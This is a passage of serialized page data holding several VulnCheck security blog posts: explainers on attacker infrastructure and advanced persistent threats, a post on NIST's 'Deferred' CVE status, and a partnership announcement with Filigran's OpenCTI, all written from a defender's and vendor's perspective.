forms:",[22,44424,44425,44431],{},[25,44426,44427,44430],{},[295,44428,44429],{},"Centralized C2 Networks",": a hub that attackers use to manage malware and monitor compromise devices so they can issue commands, download additional malware, or extract data from victims.",[25,44432,44433,44436],{},[295,44434,44435],{},"Peer-to-Peer C2 Networks",": a decentralized model that uses a collection of compromised devices operating as both client and server that communicate to execute commands and exchange data.",[18,44438,44439],{},"Unlike the centralized C2 network, a peer-to-peer network can keep functioning after removing individual nodes, making it more resilient to interventions from law enforcement or security teams looking to disrupt the malicious C2 network.",[993,44441,44443],{"id":44442},"domain-name-system-dns","Domain Name System (DNS)",[18,44445,44446],{},"DNS translates an IP address into a human readable name. Malicious actors often use domains, domain names, and subdomains as part of phishing and other attacks in order to mask their infrastructure and fool unsuspecting users. Depending on the attackers’ sophistication and plans, they can either hijack an existing DNS server to prevent security teams from tracing the traffic to them, or configure their own servers so they can control the C2 traffic.",[993,44448,44450],{"id":44449},"proxies","Proxies",[18,44452,44453],{},"Proxies route traffic through multiple network nodes making it difficult for defenders to track and easier for malicious actors to hide their identity and location. Proxies not only add layers of obfuscation, but also allow threat actors to change their underlying IP addresses more easily, further helping them to avoid detection.",[18,44455,44456],{},"Some examples of how attackers use proxies listed by MITRE ATT&CK include:",[22,44458,44459,44469,44479],{},[25,44460,44461,44468],{},[295,44462,44463],{},[47,44464,44467],{"href":44465,"rel":44466},"https:\u002F\u002Fattack.mitre.org\u002Ftechniques\u002FT1090\u002F001\u002F",[51],"Internal proxy",": used to control traffic between nodes within a compromised network.",[25,44470,44471,44478],{},[295,44472,44473],{},[47,44474,44477],{"href":44475,"rel":44476},"https:\u002F\u002Fattack.mitre.org\u002Ftechniques\u002FT1090\u002F002\u002F",[51],"External proxy",": using port redirectors and other techniques to hide where the C2 traffic goes.",[25,44480,44481,44488],{},[295,44482,44483],{},[47,44484,44487],{"href":44485,"rel":44486},"https:\u002F\u002Fattack.mitre.org\u002Ftechniques\u002FT1090\u002F003\u002F",[51],"Multi-hop proxy",": transport C2 traffic using multiple devices to create a multi-hop proxy chain",[993,44490,44492],{"id":44491},"redirectors","Redirectors",[18,44494,44495],{},"Redirectors divert communications that the target sends or receives so defenders have a harder time tracing and shutting down the communications. Malicious actors can often use redirectors for ongoing operational resilience and persistence: If security teams identify a piece of attacker infrastructure, then the attackers can easily take down the compromised device to easily redirect to new infrastructure and continue their operations unhindered.",[993,44497,44499],{"id":44498},"relays","Relays",[18,44501,44502],{},"Relays are tools that attackers use to intercept communications, typically during a man-in-the-middle (MitM) attack. Attackers can use them in multiple ways, such as poisoning multicast protocols like MDNS, NTBS, or LLMNR, or to intercept and manipulate SMB, HTTP, or RDP traffic.",[993,44504,44506],{"id":44505},"serverless","Serverless",[18,44508,44509],{},"Malicious actors can purchase or configure serverless infrastructure from traditional cloud providers so that security teams have a hard time tracing their activity. Since the functions come from cloud provider subdomains, security teams have a difficult time separating the malicious traffic from the legitimate traffic.",[993,44511,44513],{"id":44512},"virtual-private-network-vpn","Virtual Private Network (VPN)",[18,44515,44516],{},"VPNs encrypt data-in-transit to prevent unauthorized access. VPNs enable attackers to hide in several different ways, including:",[22,44518,44519,44522,44525],{},[25,44520,44521],{},"Making exfiltrated data unusable to anyone else",[25,44523,44524],{},"Masking their IP addresses to make them harder to locate",[25,44526,44527],{},"Securing communications between the the C2 and the attacker base",[993,44529,44531],{"id":44530},"web-services","Web Services",[18,44533,44534],{},"Attackers may use various web services to accomplish their objectives. Often, they use the same services that businesses use, like Google and Github, so that they can evade detection by looking like normal incoming and outgoing traffic.",[61,44536,44538],{"id":44537},"how-does-ip-intelligence-mitigate-risks-associated-with-attacker-infrastructure","How Does IP Intelligence Mitigate Risks Associated with Attacker Infrastructure?",[18,44540,44541],{},"IP intelligence helps security teams battle against attacker IP address and domain manipulation. Organizations often implement security controls that rely on blocklists and allowlists. For example, firewall rules define the IP addresses that users can communicate with and protective DNS tools block users from accessing malicious websites.",[18,44543,44544],{},"However, DNS fluxing and IP churn can make these lists outdated. With IP intelligence, security teams can keep pace with attackers and block their infrastructures. VunCheck IP Intelligence provides live tracking of attacker C2 infrastructures so that security teams can implement dynamic block lists. Additionally, VulnCheck IP Intelligence includes data from the past 3, 10, 30, and 90 days so that security teams can hunt for historic IP data, even as attackers continuously change the IP addresses to evade detection.",[18,44546,44547],{},"Since VulnCheck is exclusively threat focused, our IP Intelligence makes it easier to block attacker infrastructure and rapidly identify vulnerable systems.",[44317,44549],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":44551},[44552,44553,44563],{"id":44384,"depth":220,"text":44385},{"id":44411,"depth":220,"text":44412,"children":44554},[44555,44556,44557,44558,44559,44560,44561,44562],{"id":44418,"depth":1266,"text":44419},{"id":44442,"depth":1266,"text":44443},{"id":44449,"depth":1266,"text":44450},{"id":44491,"depth":1266,"text":44492},{"id":44498,"depth":1266,"text":44499},{"id":44505,"depth":1266,"text":44506},{"id":44512,"depth":1266,"text":44513},{"id":44530,"depth":1266,"text":44531},{"id":44537,"depth":220,"text":44538},"2025-04-18","Exploit Intel 101 - Attacker Infrastructure",{"slug":44567},"attacker-infrastructure","\u002Fblog\u002Fattacker-infrastructure",{"title":44351,"description":44565},{"title":41489,"color":41490,"icon":41491},"blog\u002Fattacker-infrastructure",[41494],"25ukwgMjkvKxKi8TCbq9y7q7NpWoP0hbePN9wBE3tNI",{"id":44575,"title":44576,"articles":7,"authors":44577,"body":44579,"date":44564,"description":44948,"extension":234,"image":7,"link":7,"meta":44949,"navigation":237,"path":44951,"seo":44952,"series":44953,"stem":44954,"subtype":7,"tags":44955,"__hash__":44956},"blog\u002Fblog\u002Funderstanding-apts.md","Understanding APTs",[44578],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":44580,"toc":44928},[44581,44583,44597,44600,44604,44607,44610,44627,44631,44634,44638,44641,44644,44648,44651,44664,44667,44671,44674,44678,44681,44685,44694,44698,44701,44712,44716,44719,44722,44742,44745,44771,44775,44787,44854,44858,44861,44865,44868,44879,44883,44897,44901,44909,44913,44916,44920,44923,44926],[18,44582,44358],{},[22,44584,44585,44588,44591,44594],{},[25,44586,44587],{},"A fundamental understanding of Advanced Persistent Threats (APTs)",[25,44589,44590],{},"How APTs work and how they are applied by threat actors",[25,44592,44593],{},"Examples of APTs and the threat actors associated with them",[25,44595,44596],{},"How APTs leverage exploited vulnerabilities",[18,44598,44599],{},"Advanced Persistent Threats (APTs) are ongoing attacks where malicious actors gain unauthorized access to systems then linger for an extended period of time. They prioritize stealth to evade detection so that they can remain in the compromised system longer, enabling them to do more damage and exfiltrate more data. By understanding what an APT is and how attackers can exploit system vulnerabilities to gain initial access, organizations can implement risk mitigation strategies.",[61,44601,44603],{"id":44602},"what-is-an-advanced-persistent-threat-apt","What is an advanced persistent threat (APT)?",[18,44605,44606],{},"An advanced persistent threat (APT) is a prolonged and strategic cyber attack by highly skilled threat actors. Attackers start by gaining unauthorized access to the target network so they can exfiltrate data over an extended period. APTs require planning since they often use sophisticated techniques.",[18,44608,44609],{},"When categorizing an attack as an APT, some typical features include:",[22,44611,44612,44615,44618,44621,44624],{},[25,44613,44614],{},"Maintaining access for a long time, sometimes years",[25,44616,44617],{},"Using advanced tools and techniques, like zero-day exploits or credential harvesting",[25,44619,44620],{},"Blending into legitimate network traffic to avoid detection",[25,44622,44623],{},"Focusing on high-value targets, like government agencies, defense contractors, or enterprises",[25,44625,44626],{},"Stealing data, like intellectual property, rather than causing direct damage",[61,44628,44630],{"id":44629},"what-are-the-stages-of-an-apt-attack","What are the Stages of an APT attack?",[18,44632,44633],{},"APTs are structured and stealthy operations that seek to compromise critical networks and their data. Across each step of the attack, security teams have an opportunity to thwart the malicious actors.",[993,44635,44637],{"id":44636},"reconnaissance-and-initial-access","Reconnaissance and initial access",[18,44639,44640],{},"During the reconnaissance phase, the attackers typically look for vulnerabilities that they can use to gain unauthorized access. These vulnerabilities can be in software, hardware, and firmware. Additionally, in cloud-native environments, attackers can use stolen or leaked credentials as a way to gain this initial access.",[18,44642,44643],{},"Unlike broader attacks that take a pray and spray approach, APTs use tailored tools or take a targeted focus, like understanding an organization’s technology stack to look for weaknesses or crafting specialized social engineering attacks.",[993,44645,44647],{"id":44646},"establish-a-foothold","Establish a foothold",[18,44649,44650],{},"Attackers use various techniques to maintain access so they can continue to operate while evading detection, including using:",[22,44652,44653,44658],{},[25,44654,44655,44657],{},[295,44656,44272],{},": using existing vulnerabilities to maintain an unauthorized access point",[25,44659,44660,44663],{},[295,44661,44662],{},"Rootkits",": malicious software on machines that allows attackers to perform remote actions or steal data",[18,44665,44666],{},"The threat actors create the additional entry points so that they can access the compromised system if the organization remediates the initial attack vector.",[993,44668,44670],{"id":44669},"escalate-privileges","Escalate privileges",[18,44672,44673],{},"After creating their own entry points, attackers explore the organization’s networks to identify critical assets, like databases. During this process, they gather additional credentials so that they can gain privileged access that allows them to target high-value assets and deploy advanced malware to disguise their activity.",[993,44675,44677],{"id":44676},"move-laterally","Move laterally",[18,44679,44680],{},"Lateral movement is when the attackers expand their control by accessing different infrastructure components, like workstations or servers. As with the earlier stages, they often deploy additional entry points using backdoors or malware so they can continue to explore networks and exploit additional vulnerabilities.",[993,44682,44684],{"id":44683},"exfiltrate-data","Exfiltrate data",[18,44686,44687,44688,44693],{},"Once the attackers reach their targets, they begin to steal sensitive data or intellectual property, sending it to their ",[47,44689,44692],{"href":44690,"rel":44691},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Factive-c2-servers",[51],"command and control (C2) servers."," To hide exfiltration, they may deploy additional attacks to distract defenders, like using ransomware or a Distributed Denial of Service (DDoS) attack.",[993,44695,44697],{"id":44696},"complete-objectives","Complete objectives",[18,44699,44700],{},"When attackers have completed their objectives or worry about being caught, they exit the system and remove evidence of their existence. These exit strategies can include:",[22,44702,44703,44706,44709],{},[25,44704,44705],{},"Erasing log data",[25,44707,44708],{},"Removing backdoor or malware",[25,44710,44711],{},"Manipulating audit trails",[61,44713,44715],{"id":44714},"what-are-the-main-motives-and-targets-of-an-apt-attack","What are the main motives and targets of an APT attack?",[18,44717,44718],{},"Unlike conventional cyber attacks, APT actors, who are often affiliated with nation-state groups, focus on espionage rather than network destruction.",[18,44720,44721],{},"The main motives underlying APT attacks include:",[22,44723,44724,44730,44736],{},[25,44725,44726,44729],{},[295,44727,44728],{},"Intellectual Property Theft",": Stealing confidential data, such as product designs or business strategies.",[25,44731,44732,44735],{},[295,44733,44734],{},"Surveillance",": Gathering intelligence on competitors or foreign entities.",[25,44737,44738,44741],{},[295,44739,44740],{},"Economic Advantage",": Undermining a competitor’s business operations through unauthorized access.",[18,44743,44744],{},"Since APT attacks require highly technical skills, they often target organizations and industries that create, maintain, or store sensitive data, including:",[22,44746,44747,44753,44759,44765],{},[25,44748,44749,44752],{},[295,44750,44751],{},"Large Corporations",": repository of valuable data.",[25,44754,44755,44758],{},[295,44756,44757],{},"Defense and Aerospace Industries",": access to sensitive defense technologies.",[25,44760,44761,44764],{},[295,44762,44763],{},"Government Agencies",": strategic intelligence on policy and diplomatic matters.",[25,44766,44767,44770],{},[295,44768,44769],{},"Critical Infrastructures",": data about energy grids and financial systems.",[61,44772,44774],{"id":44773},"what-are-examples-of-apt-groups","What are examples of APT Groups?",[18,44776,44777,44778,44783,44784,44786],{},"APT groups are the cybercriminal organizations responsible for deploying the attack. An APT group may claim responsibility for an attack or be categorized by external parties, like ",[47,44779,44782],{"href":44780,"rel":44781},"https:\u002F\u002Fattack.mitre.org\u002Fgroups\u002F",[51],"MITRE ATT&CK,"," because a set of attacks uses similar tactics, techniques, and procedures (TTPs).",[1823,44785],{},"\nSome examples of these APT groups include:",[22,44788,44789,44800,44806,44812,44818,44824,44830,44836,44842,44848],{},[25,44790,44791,10515,44794,44799],{},[295,44792,44793],{},"APT31:",[47,44795,44798],{"href":44796,"rel":44797},"https:\u002F\u002Fcloud.google.com\u002Fsecurity\u002Fresources\u002Finsights\u002Fapt-groups",[51],"suspected Chinese cyber espionage actor"," that exploited vulnerabilities in Java and Adobe Flash to compromise environments when targeting governmental entities, financial services, defense contractors, engineering, telecommunications, media, and insurance companies",[25,44801,44802,44805],{},[295,44803,44804],{},"APT37",": North Korean state-sponsored cyber espionage group that exploits known vulnerabilities in Hangul Word Processor and Adobe Flash and zero-day vulnerabilities when targeting chemical, electronics, manufacturing, automotive, and healthcare organizations across South Korea, Japan, Vietnam, and the Middle East",[25,44807,44808,44811],{},[295,44809,44810],{},"CyberAv3ngers",": suspected Iranian Government Islamic Revolutionary Guard Corp (IRGC)-affiliated group that targeted programmable logic controllers (PLCs) in 2023",[25,44813,44814,44817],{},[295,44815,44816],{},"Inception:"," cyber espionage group targeting various industries and governmental entities across Russia, the US, and Europe",[25,44819,44820,44823],{},[295,44821,44822],{},"Machete",": suspected Spanish-speaking cyber espionage group that focuses on Latin America, targeting high-profile organizations like government entities, intelligence services, military units, telecommunications companies, and power companies",[25,44825,44826,44829],{},[295,44827,44828],{},"Metador",": cyber espionage group targeting telecommunication companies, internet service providers (ISPs) and universities across the Middle East and Africa since 2022",[25,44831,44832,44835],{},[295,44833,44834],{},"Moonstone Sleet",": cyber espionage operation using fake companies and personas to deploy social engineering attacks since 2023",[25,44837,44838,44841],{},[295,44839,44840],{},"Patchwork",": cyber espionage group targeting diplomatic entities, government agencies, and think tanks since 2015",[25,44843,44844,44847],{},[295,44845,44846],{},"RedCurl",": suspected Russian-speaking threat actor engaging in corporate espionage against travel agencies, insurance companies, and bank across Ukraine, Canada, and Kingdom",[25,44849,44850,44853],{},[295,44851,44852],{},"Thrip",": espionage group that uses custom malware and “living off the land” techniques when targeting satellite communications, telecommunications, and defense contractor companies across the US and Southeast Asia",[61,44855,44857],{"id":44856},"how-apt-groups-use-vulnerabilities-to-gain-initial-access","How APT Groups Use Vulnerabilities to Gain Initial Access",[18,44859,44860],{},"Unlike financially motivated cybercriminals who often purchase exploits on the dark web, APT groups often have the skills, experience, and advanced tools necessary to deploy sophisticated techniques.",[993,44862,44864],{"id":44863},"spear-phishing-attacks","Spear-phishing attacks",[18,44866,44867],{},"Spear-phishing attacks send malicious emails to specific targets, tricking them into clicking on a malicious link. Attackers can use this process to steal sessions tokens which enables them to compromise applications that have a broken access control vulnerabilities arising from:",[22,44869,44870,44873,44876],{},[25,44871,44872],{},"Failure to invalidate stateful session identifiers on the server after users log out",[25,44874,44875],{},"Long-lived stateless JWT tokens that extend an attackers opportunity to use them",[25,44877,44878],{},"Lack of OAuth standards for revoking long-lived JWTs",[993,44880,44882],{"id":44881},"unpatched-software","Unpatched software",[18,44884,44885,44886,44890,44891,44896],{},"Once attackers know that a vulnerability exists, they look for ways to use it as part of their attacks. For example, in 2024, ",[47,44887,44889],{"href":13143,"rel":44888},[51],"23.6% of known vulnerabilities were exploited"," on or before they were published. Additionally, between 2014 and 2023, ",[47,44892,44895],{"href":44893,"rel":44894},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fstate-of-exploitation-a-decade",[51],"attackers exploited 1.1% of vulnerabilities"," listed in VulnCheck’s Known Exploited Vulnerabilities (KEV).",[993,44898,44900],{"id":44899},"zero-day-attacks","Zero-day attacks",[18,44902,44903,44904,59],{},"APT groups are more likely to exploit previously unknown vulnerabilities in zero-day attacks than other cybercriminals because they have the financial, tooling, and skill resources to find these weaknesses. Organizations often need to wait for vendors or security researchers to publish the vulnerabilities, leaving them at risk. In some cases, the vendors may not realize that the vulnerability exists until attackers exploit it. For example, in 2024, VulnCheck offered advanced warnings for ",[47,44905,44908],{"href":44906,"rel":44907},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fvulncheck-iai-2024",[51],"nine zero-day vulnerabilities",[993,44910,44912],{"id":44911},"supply-chain-attacks","Supply chain attacks",[18,44914,44915],{},"Every organization uses technologies which means that a vulnerability in a vendor’s environment can impact its customers. Even more challenging, attackers increasingly target vulnerabilities in the software supply chain as developers use third-party components. Tracing all these components and their dependencies becomes overwhelming which gives APT groups an opportunity to find and exploit vulnerabilities.",[61,44917,44919],{"id":44918},"understanding-vulnerability-exploits-to-reduce-apt-risks-with-vulncheck","Understanding Vulnerability Exploits to Reduce APT Risks with VulnCheck",[18,44921,44922],{},"VulnCheck Exploit & Vulnerability Intelligence enables you to understand the state of vulnerability exploitation by combining technical vulnerability data with open source intelligence to understand how attackers, like APT groups, are acting in the real world. Unlike other vulnerability databases or vulnerability management solutions, VulnCheck includes the latest information about a wider range of vulnerabilities, including those found in open source packages and dependencies and those in mobile, Internet of Things (IoT), and operational technology (OT) devices - and more.",[18,44924,44925],{},"VulnCheck Vulnerability Intelligence provides vulnerability enrichment with insights into vulnerability risk and severity by tracking vendor and government advisories to provide the context you need to prioritize remediation activities.",[44317,44927],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":44929},[44930,44931,44939,44940,44941,44947],{"id":44602,"depth":220,"text":44603},{"id":44629,"depth":220,"text":44630,"children":44932},[44933,44934,44935,44936,44937,44938],{"id":44636,"depth":1266,"text":44637},{"id":44646,"depth":1266,"text":44647},{"id":44669,"depth":1266,"text":44670},{"id":44676,"depth":1266,"text":44677},{"id":44683,"depth":1266,"text":44684},{"id":44696,"depth":1266,"text":44697},{"id":44714,"depth":220,"text":44715},{"id":44773,"depth":220,"text":44774},{"id":44856,"depth":220,"text":44857,"children":44942},[44943,44944,44945,44946],{"id":44863,"depth":1266,"text":44864},{"id":44881,"depth":1266,"text":44882},{"id":44899,"depth":1266,"text":44900},{"id":44911,"depth":1266,"text":44912},{"id":44918,"depth":220,"text":44919},"Exploit Intel 101 - Understanding APTs",{"slug":44950},"understanding-apts","\u002Fblog\u002Funderstanding-apts",{"title":44576,"description":44948},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-apts",[41494],"rNO-PnMPybXx6l841aWevV3H_wpOp_jdTYJFkyqhTn0",{"id":44958,"title":44959,"articles":7,"authors":44960,"body":44966,"date":45079,"description":45080,"extension":234,"image":7,"link":7,"meta":45081,"navigation":237,"path":45083,"seo":45084,"series":7,"stem":45085,"subtype":7,"tags":45086,"__hash__":45088},"blog\u002Fblog\u002Fnist-nvd-deferred.md","NIST’s New Deferred CVE Status: What It Means for Defenders",[44961],{"name":44962,"avatar":44963,"link":44964,"linkName":44965},"Tony Wenzel","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U06FBQX2YHF-d3d608882a38-512","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fawenzel\u002F","in\u002Fawenzel\u002F",{"type":15,"value":44967,"toc":45072},[44968,44974,44981,44986,44989,44993,44996,44999,45003,45006,45009,45041,45045,45048,45051,45055,45058,45060,45063,45066],[18,44969,44970],{},[68,44971],{"alt":44972,"src":44973,"width":28205},"NIST NVD Deferred","\u002Fblog\u002Fnist-nvd-deferred\u002Fnist-nvd-deferred.png",[18,44975,44976,44977,44980],{},"The National Institute of Standards and Technology (NIST) recently made a significant update to the National Vulnerability Database (NVD): the introduction of a new CVE status called ",[295,44978,44979],{},"“Deferred.”"," This status has been applied to over 80,000 CVEs and we expect this to apply to over 95,000 CVEs over the next few days, and according to NIST:",[43656,44982,44983],{"author":37514},[18,44984,44985],{},"We are assigning this status to older CVEs to indicate that we do not plan to prioritize updating NVD enrichment or initial NVD enrichment data due to the CVE’s age.",[18,44987,44988],{},"While this update may help NIST better allocate its limited resources, it introduces new risk to organizations that rely on the NVD as their primary source of vulnerability intelligence.",[61,44990,44992],{"id":44991},"what-does-deferred-really-mean-for-security-teams","What Does “Deferred” Really Mean for Security Teams?",[18,44994,44995],{},"On paper, “Deferred” implies lower urgency—but in reality, the risks tied to these CVEs haven’t disappeared. In fact, older vulnerabilities are often recycled and reused in active campaigns by both opportunistic and sophisticated threat actors.",[18,44997,44998],{},"The “Deferred” label doesn’t mean these vulnerabilities are safe to ignore. It simply means they’re no longer being enriched with updated metadata by the NVD. That includes vital details like metrics, affected products, exploit information, and other intelligence.",[61,45000,45002],{"id":45001},"at-vulncheck-we-dont-defer-risk","At VulnCheck, We Don’t Defer Risk",[18,45004,45005],{},"VulnCheck treats every CVE as a forever-day, because we know exploitation doesn’t adhere to timelines or maintenance cycles. Our platform continues to monitor, enrich, and prioritize all CVEs—regardless of their status in the NVD.",[18,45007,45008],{},"Here’s how we do it:",[22,45010,45011,45017,45023,45029,45035],{},[25,45012,45013,45016],{},[295,45014,45015],{},"Autonomous Enrichment",": We continuously collect and apply new evidence of in-the-wild exploitation, new exploit discoveries, and related IOCs.",[25,45018,45019,45022],{},[295,45020,45021],{},"Threat Actor Attribution",": Our intelligence maps CVEs to real-world adversaries and campaigns, helping prioritize what matters most to your organization and deprioritize the things that don’t.",[25,45024,45025,45028],{},[295,45026,45027],{},"Exploit Discovery",": VulnCheck identifies new exploit code and activity faster than traditional feeds, often before it spreads widely.",[25,45030,45031,45034],{},[295,45032,45033],{},"Complete CVE Coverage",": No CVE is left behind. Whether it’s newly published or deemed “Deferred,” VulnCheck delivers enrichment and context to every vulnerability.",[25,45036,45037,45040],{},[295,45038,45039],{},"Retro CWE Mapping",": NIST NVD only goes as far back as 2007 for mapping CWEs, VulnCheck maps CWEs as far back as 1998.",[61,45042,45044],{"id":45043},"why-this-matters-now","Why This Matters Now",[18,45046,45047],{},"The introduction of the “Deferred” status represents a fundamental shift in how vulnerability data is curated at NIST and it further highlights the limitations of relying solely on the NVD for vulnerability intelligence.",[18,45049,45050],{},"We’re committed to providing a comprehensive, real-time view of the exploitability landscape—so you’re never blindsided by a supposedly “low-priority” vulnerability that turns out to be actively exploited.",[61,45052,45054],{"id":45053},"stay-ahead-of-the-threat-curve","Stay Ahead of the Threat Curve",[18,45056,45057],{},"If you’re ready to take a more proactive, evidence-based approach to vulnerability intelligence, let’s talk. VulnCheck is purpose-built to help teams detect, prioritize, and respond to real-world threats—no matter how long ago the CVE was published.",[61,45059,202],{"id":201},[18,45061,45062],{},"VulnCheck is helping organizations not just to solve the vulnerability prioritization challenge - we’re working to help equip any product manager, security team and threat hunting team to get faster and more accurate intelligence with infinite efficiency using VulnCheck solutions.",[18,45064,45065],{},"We knew that defenders needed better data, faster across the board, in our industry. So that’s what we deliver to the market. We’re deliver key insights on vulnerability management, exploitation and major trends we can extrapolate from our dataset to continuously support practitioners.",[18,45067,211,45068,45071],{},[47,45069,216],{"href":214,"rel":45070},[51]," has the broadest coverage.",{"title":219,"searchDepth":220,"depth":220,"links":45073},[45074,45075,45076,45077,45078],{"id":44991,"depth":220,"text":44992},{"id":45001,"depth":220,"text":45002},{"id":45043,"depth":220,"text":45044},{"id":45053,"depth":220,"text":45054},{"id":201,"depth":220,"text":202},"2025-04-14","VulnCheck treats every CVE as a forever-day, because we know exploitation doesn’t adhere to timelines or maintenance cycles.",{"slug":45082},"nist-nvd-deferred","\u002Fblog\u002Fnist-nvd-deferred",{"title":44959,"description":45080},"blog\u002Fnist-nvd-deferred",[242,1279,45087,33173],"exploit-intel","6dT__c-J5PWlPPG9LDa6Aen0SI033R7xJvBJK_zXVss",{"id":45090,"title":45091,"articles":7,"authors":45092,"body":45094,"date":45328,"description":45113,"extension":234,"image":7,"link":7,"meta":45329,"navigation":237,"path":45331,"seo":45332,"series":7,"stem":45333,"subtype":7,"tags":7,"__hash__":45334},"blog\u002Fblog\u002Fvulncheck-filigran-parternship.md","VulnCheck & Filigran: Delivering Actionable Security Intelligence for the Enterprise",[45093],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":45095,"toc":45313},[45096,45101,45107,45111,45114,45121,45127,45130,45144,45147,45153,45156,45160,45163,45167,45170,45174,45177,45181,45184,45190,45193,45196,45207,45213,45216,45245,45248,45250,45253,45256,45263,45267,45270,45273,45277,45280,45310],[1920,45097,45099],{"id":45098},"vulncheck-filigran-delivering-actionable-security-intelligence-for-the-enterprise",[295,45100,45091],{},[18,45102,45103],{},[68,45104],{"alt":45105,"src":45106,"style":40707},"VulnCheck & Filigran Parternship","\u002Fblog\u002Fvulncheck-filigran-parternship\u002Fimage-1.png",[61,45108,45109],{"id":40710},[295,45110,40713],{},[18,45112,45113],{},"Filigran and VulnCheck are proud to announce a strategic partnership that transforms enterprise threat intelligence capabilities through seamless integration. This collaboration brings together Filigran's market-leading OpenCTI platform with VulnCheck's comprehensive exploit intelligence solutions, creating a powerful joint offering that delivers immediate business value to security teams to enable scalable, automated response actioning.",[43656,45115,45118],{"author":45116,"position":45117},"Jan Johansen","SVP Global Alliances",[18,45119,45120],{},"\"I am thrilled to give the OpenCTI community access to this leading source of Vulnerability intelligence,\" said Jan Johansen, SVP Global Alliances. \"This partnership enables security teams to leverage VulnCheck's exceptional vulnerability data directly within their existing OpenCTI workflows.\"",[61,45122,45124],{"id":45123},"addressing-critical-enterprise-security-challenges",[295,45125,45126],{},"Addressing Critical Enterprise Security Challenges",[18,45128,45129],{},"Today's security teams face mounting pressure to:",[22,45131,45132,45135,45138,45141],{},[25,45133,45134],{},"Autonomously identify which vulnerabilities actually pose material risk to their organization",[25,45136,45137],{},"Reduce alert fatigue and focus resources on the threats that matter",[25,45139,45140],{},"Demonstrate ROI on security investments to executive stakeholders",[25,45142,45143],{},"Accelerate time-to-remediation for critical vulnerabilities that are known exploited with linkages to threat actor activity, botnets and ransomware families",[18,45145,45146],{},"The integration between VulnCheck and Filigran's OpenCTI directly addresses these challenges by providing actionable, contextualized intelligence that drives efficient SecOps workflow for enterprise teams across vulnerability management, cyber threat intelligence, AppSec and IR functions.",[61,45148,45150],{"id":45149},"quantifiable-business-benefits",[295,45151,45152],{},"Quantifiable Business Benefits",[18,45154,45155],{},"Organizations leveraging the VulnCheck-Filigran integration can realize substantial business value:",[993,45157,45159],{"id":45158},"_1-reduced-mean-time-to-remediate-mttr","1. Reduced Mean Time to Remediate (MTTR)",[18,45161,45162],{},"By automatically identifying vulnerabilities actively being exploited in the wild, security teams can cut through the noise and focus on what matters most. This integration helps organizations significantly accelerate remediation timeframes for the vulnerabilities that pose the greatest actual risk to their business based on CVEs that are weaponized, exploited in the wild or predicted to be exploited.",[993,45164,45166],{"id":45165},"_2-enhanced-security-resource-optimization","2. Enhanced Security Resource Optimization",[18,45168,45169],{},"Security teams can now allocate their limited resources more effectively by focusing on vulnerabilities that pose genuine risk based on real-world exploitation data rather than theoretical CVSS scores alone. This intelligence-driven approach enables teams to maximize the impact of their security efforts. This integration is a force multiplier for any enterprise team given the global shortage of analysts.",[993,45171,45173],{"id":45172},"_3-improved-cross-team-collaboration","3. Improved Cross-Team Collaboration",[18,45175,45176],{},"The integration creates a unified intelligence platform that bridges the gap between vulnerability management, threat intelligence, and security operations functions in the enterprise. This shared operational picture enhances communication and streamlines response workflows.",[993,45178,45180],{"id":45179},"_4-demonstrable-security-roi","4. Demonstrable Security ROI",[18,45182,45183],{},"By focusing on exploitable vulnerabilities with clear business impact, security leaders can more effectively communicate value to executive stakeholders through concrete metrics and risk reduction data.",[61,45185,45187],{"id":45186},"strategic-business-value",[295,45188,45189],{},"Strategic Business Value",[18,45191,45192],{},"The VulnCheck-OpenCTI integration transforms vulnerability management from a volume-based approach without a way to prioritize material CVEs, to an intelligence-driven strategy. Instead of attempting to address thousands of theoretical CVEs, security teams can now focus on the small percentage of vulnerabilities being actively exploited that pose a material risk to their business.",[18,45194,45195],{},"This strategic shift enables organizations to:",[22,45197,45198,45201,45204],{},[25,45199,45200],{},"Optimize security resources on threats that matter most",[25,45202,45203],{},"Make intelligence-driven decisions based on real-world exploitation intelligence",[25,45205,45206],{},"Strengthen their security posture while improving operational efficiency",[61,45208,45210],{"id":45209},"how-the-integration-works",[295,45211,45212],{},"How the Integration Works",[18,45214,45215],{},"The VulnCheck Connector for OpenCTI seamlessly imports and translates comprehensive vulnerability intelligence into structured STIX objects within the OpenCTI platform. The connector supports multiple intelligence feeds, including:",[22,45217,45218,45224,45229,45234,45239],{},[25,45219,45220,45223],{},[295,45221,45222],{},"VulnCheck Known Exploited Vulnerabilities (KEV)",": Prioritize vulnerabilities actively being exploited in the wild",[25,45225,45226,45228],{},[295,45227,42306],{},": Map exploits to specific vulnerabilities with technical details",[25,45230,45231,45233],{},[295,45232,1245],{},": Identify vulnerabilities commonly used as entry points by threat actors",[25,45235,45236,45238],{},[295,45237,1251],{},": Correlate network indicators with vulnerability exploitation attempts",[25,45240,45241,45244],{},[295,45242,45243],{},"Ransomware Intelligence",": Associate vulnerabilities with specific ransomware families and campaigns",[18,45246,45247],{},"Each feed is systematically processed to generate actionable intelligence that integrates directly into existing OpenCTI workflows, enabling rapid analysis and response.",[61,45249,202],{"id":201},[18,45251,45252],{},"VulnCheck is a leader in vulnerability and exploit intelligence, equipping organizations with real-time, high-fidelity data to enhance security operations. By delivering machine-readable threat intelligence, VulnCheck empowers security teams to make informed decisions, prioritize vulnerabilities, and mitigate risks efficiently.",[18,45254,45255],{},"VulnCheck delivers 100% autonomous exploit intelligence solutions to enterprise, Federal government, and cybersecurity organizations. VulnCheck provides machine-readable feeds that enable analysts to prioritize vulnerabilities that genuinely matter for defending their organization.",[18,45257,45258,45259,45262],{},"OpenCTI users can sign up for the VulnCheck community feeds at ",[47,45260,40745],{"href":40745,"rel":45261},[51]," and access the VulnCheck KEV (the VulnCheck Known Exploited Vulnerabilities Catalog) and VulnCheck NVD++ (single source of NIST NVD enriched with VulnCheck CPE and Mitre CVE list) feeds.",[61,45264,45265],{"id":1902},[295,45266,1903],{},[18,45268,45269],{},"This partnership marks a significant advancement in cyber threat intelligence. By integrating VulnCheck's exploit and vulnerability insights into Filigran's OpenCTI-powered eXtended Threat Management (XTM) suite, security teams can enhance their proactive defense strategies and strengthen their overall security posture.",[18,45271,45272],{},"The VulnCheck-OpenCTI integration is a natural fit 